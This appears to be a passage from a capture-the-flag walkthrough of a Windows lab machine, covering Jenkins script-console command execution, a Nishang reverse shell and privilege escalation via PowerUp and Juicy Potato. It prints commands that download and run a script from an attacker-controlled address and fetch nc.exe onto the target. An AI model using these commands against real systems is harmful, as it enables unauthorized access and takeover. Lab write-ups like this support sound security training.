Quickly checking gobuster for jetty shows that we have a directory to check out
Going there we see Jenkins!
Turns out we have command execution without needing to be logged in which works in our favor
Initial Access
Using Nishang Invoke-PowerShellTcp.ps1 script we can create a reverse shell and get access to the box
First we want to copy the example to the bottom of the script so that it is run when copied to the machine we are attacking
Next we want to get a web server running and a netcat listener to catch the reverse shell. In this se I am using updog for my simple web server.
Using the script console again I run this command to download and execute the invoke powershell tcp reverse shell script
And we get a shell back!
This allows us to get user.txt!
Privilege Escalation
Juicy Potato
Next we want to run PowerUp.ps1 however we want to use the dev branch as it has extra checks
Then we want to run these commands in our reverse shell
IEX(New-Object Net.WebCLient).downloadString('http://10.10.14.92/PowerUp.ps1')
Invoke-AllChecks # This runs the powershell function to check everything
Right away we see SeImpersonatePrivilege which means this box is vulnerable to Juicy Potato!
We first need to download JuicyPotato.exe to the box which I am hosting from my kali box
We need to copy kali's nc.exe to the windows box
# nc.exe is located /usr/share/windows-resources/binaries/nc.exe on kali
Invoke-WebRequest "http://10.10.14.92/nc.exe" -OutFile "nc.exe"